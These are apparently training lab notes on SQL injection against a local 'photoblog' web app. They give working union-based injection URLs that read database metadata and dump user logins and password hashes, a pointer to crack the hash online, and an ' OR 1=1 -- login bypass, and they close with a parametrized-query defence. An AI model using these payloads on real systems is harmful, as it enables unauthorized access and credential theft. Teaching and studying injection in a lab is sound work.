1

SQL INJECTION QUICK NOTES

WORKING WITH BACK END DATABASE:

mysql -u root Connects to MySQL database management system.

show databases; Show databases

use photoblog; Select photoblog database

show tables; Show tables

select * from users; Show "users" table content

 2

select * from pictures; Show "pictures" table content

show columns from users; Show users table structure

show columns from pictures; Show pictures table structure

 3

select * from pictures union select * from Show an error the two select queries have different number of columns;
users;

select title from pictures union select login Show column title from pictures concatenated with column login from users
from users;

Select title,img from pictures union select Show columns title,img from pictures concatenated with columns login,password
login,password from users; from users
 4

Quit Quits mysql

Ifconfig Get IP address

WORKING WITH FRONT END WEB SITE:

In what follows, replace the IP address by
your machine IP address.
http://192.168.1.144/cat.php?id=1 ===> select * from pictures where cat=1
==> Show pictures of category 1
 5

http://192.168.1.144/cat.php?id=2 ===> select * from pictures where cat=2

==> Show other pictures of category 2
 6

http://192.168.1.144/cat.php?id=2% ===> select * from pictures where cat=2%

==> Show Error

http://192.168.1.144/cat.php?id=2-1 ===> select * from pictures where cat=2-1

==> Show pictures of category 1
 7

http://192.168.1.144/cat.php?id=1+1 ===> select * from pictures where cat=1 + 1

==> Show Error
 8

===> select * from pictures where cat=1 union select 1

==> Show error as number of columns in the left select statement is different from
the right select statement

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=1 union select 1,2
select 1,2 ==> Show error as number of columns in the left select statement is different from
the right select statement

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=1 union select 1,2,3
select 1,2,3 ==> Show error as number of columns in the left select statement is different from
the right select statement
 9

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=2 union select 1,2,3,4
select 1,2,3,4 ==> no error, the left select statement have 4 columns.
Also, image and image title are coming from column number 2 in the left and right
select statements.
Hacker could use column number 2 as input in the URL, and output in the page for
SQL Injection scripts.
 10

http://192.168.1.144/cat.php?id=1 union Show mysql version

select 1,@@version,3,4
 11

http://192.168.1.144/cat.php?id=1 union Show current mysql user

select 1,current_user(),3,4
 12

http://192.168.1.144/cat.php?id=1 union Show current used database: photoblog.

select 1,database(),3,4
 13

http://192.168.1.144/cat.php?id=1 union Show all tables names used in mysql DBMS.

select 1,table_name,3,4 from We clearly see the database tables: categories, pictures and users.
information_schema.tables
 14

192.168.1.144/cat.php?id=1union select Show all tables column names used in mysql DBMS.
1,column_name,3,4 from We clearly see the columns: login, password which belongs to the table users.
information_schema.columns
 15

http://192.168.1.144/cat.php?id=1 union The hacker could get user login easily.

select 1,login,3,4 from users
 16

http://192.168.1.144/cat.php?id=1 union The hacker could get user password easily. Here the password is encrypted.
select 1,password,3,4 from users
 17

http://192.168.1.144/cat.php?id=1 union The hacker could get user login and password easily. Here the password is
select 1,concat(login, %27:%27, encrypted.
password),3,4 from users
18
 19

Enter website www.md5online.org, and try

to decrypt the encrypted password.

The password is "P4ssw0d"

 20

SIMPLE EXERCICE:
In the following section. We will create our own table, and try to hack it.

mysql -u root Connects to MySQL database management system.

use photoblog; Select photoblog database

CREATE TABLE employee (employee_name Creates the table employee.

varchar(250), employee_job varchar(250));

INSERT INTO employee (employee_name, Insert first record to employee table.’

employee_job) VALUES ('Ali Baba', 'cartoon');

INSERT INTO employee (employee_name, Insert second record to employee table.

employee_job) VALUES ('Samir Sabri', 'actor');

SELECT * from employee; View employee table content.

 21

Go back to the browser and continue.

http://192.168.1.144/cat.php?id=1 union select Show employee names.
1,employee_name,3,4 from employee
 22

http://192.168.1.144/cat.php?id=1 union select Show employee names and jobs.

1,concat(employee_name,
%27:%27,employee_job),3,4 from employee
23
 24

Hacking techniques over login page:

If you enter login=jsmith and password=demo1234, your query become in the back end:

SELECT * from users where login='jsmith' and password='demo1234';

If you enter login=' and password=a, your query become in the back end:

SELECT * from users where login=''' and password='a';

If you enter login=' OR 1=1 -- and password=demo1234, your query become in the back end:

SELECT * from users where login='' OR 1=1 --' and password='demo1234';

Parametrized queries:

query = "SELECT * FROM USERS WHERE LOGIN =? and password =?";

pstmt.setparameter(1, "’ OR 1=1 --");

pstmt.setparameter(2, "demo1234");

===> SQL will search for users with login =’ OR 1=1 -- and password=demo1234. The injected script will not be considered as part of the SQL
statement.